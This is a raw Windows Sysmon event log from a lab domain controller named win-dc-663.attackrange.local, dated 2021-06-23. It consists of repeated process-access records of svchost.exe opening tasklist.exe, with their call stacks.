21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 